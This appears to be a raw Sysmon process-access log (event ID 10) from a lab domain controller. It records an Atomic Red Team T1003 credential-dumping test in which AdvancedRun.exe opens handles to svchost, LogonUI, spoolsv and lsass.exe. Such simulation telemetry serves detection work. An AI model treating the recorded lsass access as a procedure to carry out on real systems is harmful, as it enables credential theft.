17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943941Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003943935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943934Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943933Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943932Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943931Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943929Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943928Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943926Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943925Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
